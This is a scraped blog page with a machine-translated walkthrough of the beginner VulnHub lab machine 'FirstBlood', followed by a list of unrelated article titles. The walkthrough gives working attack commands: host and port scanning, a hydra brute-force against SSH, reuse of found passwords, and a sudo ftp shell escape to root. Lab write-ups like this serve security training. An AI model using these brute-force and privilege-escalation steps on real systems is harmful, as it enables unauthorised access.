当前位置:网站首页>vulnhub-FirstBlood
vulnhub-FirstBlood
2022-07-05 15:53:00 【GALi_ two hundred and thirty-three】
Description
A VERY beginner friendly box with a LOT of hand holding.
Once the system grabs an IP, head straight to the web port before scanning.
You will find your first set of instructions which starts the guided process.
Created in Virtualbox.
Goal: Get the root flag.
Your feedback is appreciated – Twitter: @iamv1nc3nt
This is a novice target , Teach you how to penetrate a machine , Each step has corresponding prompts .
Walkthrough
Get the target IP Address
sudo arp-scan -I eth0 -l
Get IP10.0.2.20
Go directly to the web
View source code of webpage
Follow the prompts to visit rambo.html
Use nmap Port scan
nmap -p- 10.0.2.20
Discover open 60022 port
scanning web Catalog
nikto -h http://10.0.2.20/
Found another website directory /johnnyrambo/, Browser access
Next is ssh Blast , use cewl Crawl the website to generate a wordlist
cewl -w words.txt -d 1 -m 5 http://10.0.2.20/johnnyrambo/
The statistical number of rows
wc -l words.txt
137 words.txt
visit ssh.html
Crack johnny Password
hydra -l johnny -P words.txt -v 10.0.2.20 ssh -s 60022 -t 4
Crack success , adopt ssh Landing system
ssh [email protected] -p 60022
After logging into the system , Open... In the current directory README.txt
Prompted by , You can use the following command to view the local web Catalog
cat /etc/nginx/sites-enabled/default | grep -v "#"
Get into /var/www/html/ , Find another README.txt
lookup README.txt file
find / -type f -readable 2>/dev/null | grep README.txt
# 2>/dev/null 2 It's a standard error , Redirect standard error to /dev/null
see /opt/README.txt
Get an account password
username: blood
password: HackThePlanet2020!!
Switching users
su - blood
Landing successful , Find out blood User directory README.txt, Learn that in /home There may be some files in other user folders under the directory
Get into sly User folder found two files , But there is only one readable , Insufficient authority .
adopt sudo -l View current user permissions
sudo -l
blood Users can use sudo perform /bin/cat, see /home/sly/README.txt
sudo -u sly /bin/cat /home/sly/README.txt
obtain sly User's password :SylvesterStalone
Switching users sly
View user permissions
[email protected]:~$ sudo -l
Matching Defaults entries for sly on firstblood:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User sly may run the following commands on firstblood:
(ALL) /usr/bin/ftp
(root) NOPASSWD: /usr/bin/esudo-properties
utilize sudo, Sure root Permissions to perform ftp.
stay GTFOBins Website , Can be found and obtained root The method of authority
[email protected]:~$ sudo ftp
[sudo] password for sly:
ftp> !/bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)
#
ok. Successfully get root jurisdiction
边栏推荐
- Detailed explanation of C language branch statements
- Clock switching with multiple relationship
- ionic cordova项目修改插件
- 20. [stm32] realize the function of intelligent garbage can by using ultrasonic module and steering gear
- Data communication foundation smart_ Link_&_ Monitor_ Link
- Data communication foundation - Ethernet port mirroring and link aggregation
- Example project: simple hexapod Walker
- 对象和类的关系
- vulnhub-Root_ this_ box
- CSDN I'm coming
猜你喜欢
随机推荐
Codasip为RISC-V处理器系列增加Veridify安全启动功能
Nine hours, nine people, nine doors problem solving Report
ionic cordova项目修改插件
16.[STM32]从原理开始带你了解DS18B20温度传感器-四位数码管显示温度
Data communication foundation smart_ Link_&_ Monitor_ Link
Go learning ----- relevant knowledge of JWT
Noi / 1.4 07: collect bottle caps to win awards
lv_ font_ Conv offline conversion
Memo 00
Xiao Sha's arithmetic problem solving Report
Bugku alert
记录一下树莓派搭建环境中遇到的坑。。。
Array sorting num ranking merge in ascending order
How can the boss choose programmers to help me with development?
lvgl 显示图片示例
Maximum common subsequence
swiper. JS to achieve barrage effect
Data communication foundation - dynamic routing protocol rip
JS knowledge points-01
Interval DP (gravel consolidation)